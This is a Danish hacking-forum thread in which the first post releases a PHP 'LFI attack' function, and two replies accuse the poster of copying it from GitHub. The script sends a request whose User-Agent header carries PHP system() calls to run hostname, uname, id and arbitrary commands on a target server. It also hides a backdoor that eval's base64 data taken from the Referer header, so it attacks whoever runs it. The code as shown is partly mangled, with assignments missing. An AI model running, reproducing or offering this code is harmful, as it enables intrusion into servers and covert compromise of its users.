Tråd bedømmelse:
  • 1 Stemmer - 5 Gennemsnit
  • 1
  • 2
  • 3
  • 4
  • 5
[Opensource] LFI angrib function [PHP]
31-07-2013, 19:28 (Denne besked var sidst ændret: 31-07-2013, 22:15 af xTropia.)
#1
[Opensource] LFI angrib function [PHP]
[Billede: Hazard.png]
Release by; Harzard coders.

Okay, så mig og mine gode venner har sat os til at arbejde på et LFI kit igår aftes. Jeg tænkte det her måske er interessant for jer som synes penetrating er skide skægt ;)
Det her er simpelthen en af hovedfunktionerne til at angribe dit target. Undskylder hvis der er mindre fejl i scriptet, jeg har ikke rettet det før release da jeg ikke kan vente, det ligesom med en gave, man kan bare ikke vente. Jeg har ikke tid til at forklare hvad det betyder eller gør, da jeg sidder på en cafe og min kæreste er på vej hen til mig for at spise med mig.



PHP kode:
<?php
//Authors; xTropia, L!.am, H0ns3n
//Release by; Hazard coders
//Description: LFI kit function.

if($_POST['exploit']): //Release by; Hazard coders
    
$sasaranstr_replace("http://","",$_POST['host']);
    
$sp     explode("/",$sasaran);
    
$victim    $sp[0];
    
$port    80
    
$inject    str_replace($victim,"",$sasaran);
    
$command  "XHOSTNAME<?php echo system('hostname;echo  ;'); ?>XHOSTNAME";
    
$command .= "XSIP<?php echo \$_SERVER['SERVER_ADDR']; ?>XSIP";
    
$command .= "XUNAME<?php echo system('uname -a;echo  ;'); ?>XUNAME";
    
$command .= "XUSERID<?php echo system('id;echo  ;'); ?>XUSERID";
    
$command .= "XPWD<?php echo system('pwd;echo  ;'); ?>XPWD";
    
$command .= "XPHP<?php echo phpversion(); ?>XPHP";
    if(
$_POST['cwd']){
    
$command .= "XCWD<?php chdir('".$_POST['cwd']."'); ?>XCWD";
    }
    
$command .= "EXPLORE<pre><?php echo system('".$_POST['cmd']."; echo    ; exit;'); ?></pre>EXPLORE";
    
    if(
eregi(":",$victim)){
        
$vp explode(":",$victim);
        
$victim $vp[0];
        
$port    $vp[1];
    }

    
$sock fsockopen($victim,$port,$errno,$errstr,30);
    if (
$sock) {
        
$get  "GET ".$exploit." HTTP/1.1\r\n".
                
"Host: ".$victim."\r\n".
                
"Accept: */*\r\n".
                
"User-Agent: Mozilla/5.0 ".$command."\r\n".
                
"Connection: Close\r\n\r\n";
        
fputs($sock,$get);        
        while (!
feof($sock)) {
            
$output .= trim(fgets($sock3600000))."\n";            
        }
        
fclose($sock);
    }
    
$hostp     explode("XHOSTNAME",$output); $hostname $hostp[1];
    
$ipp    explode("XSIP",$output); $ip $ipp[1];
    
$unamep    explode("XUNAME",$output); $uname $unamep[1];
    
$userp    explode("XUSERID",$output); $userid $userp[1];
    
$currp    explode("XPWD",$output); $current $currp[1];
    
$writes    = @is_writable($current);
    
$phpvp    explode("XPHP",$output); $phpversion $phpvp[1];
    
$hasil    explode("EXPLORE",$output); $return $hasil[1];
    
    
endif;
        
$ipx =$_SERVER["REMOTE_ADDR"];
        
$portx ="22";
 
parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ""+"join(array_slice($a,count($a)-3)))));echo '</star>';}
?>
<form action='<?php echo $_SERVER['PHP_SELF'?>' method='post'>
<?php if($_POST['exploit']){ 
?>
Success is not final, failure is not fatal: it is the courage to continue that counts.
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
31-07-2013, 23:14
#2
RE: [Opensource] LFI angrib function [PHP]
https://github.com/aeonsf/Application_Se...ommand.php

Postet for et år siden og du arbejdede på det igår ?
Følg mig på twitter: https://twitter.com/Morph3s
Find alle beskeder fra denne bruger
Citer denne besked i et svar
31-07-2013, 23:30 (Denne besked var sidst ændret: 31-07-2013, 23:30 af Juicy.)
#3
RE: [Opensource] LFI angrib function [PHP]
(31-07-2013, 23:14)Morph3s Skrev: https://github.com/aeonsf/Application_Se...ommand.php

Postet for et år siden og du arbejdede på det igår ?

Av av av.. Ækelt af dig OP du prøver at steale credits!

OP tror ikke at Google er opfundet....
Besøg denne brugers hjemmeside Find alle beskeder fra denne bruger
Citer denne besked i et svar
« Ældre | Nyere »




User(s) browsing this thread: 1 Gæst(er)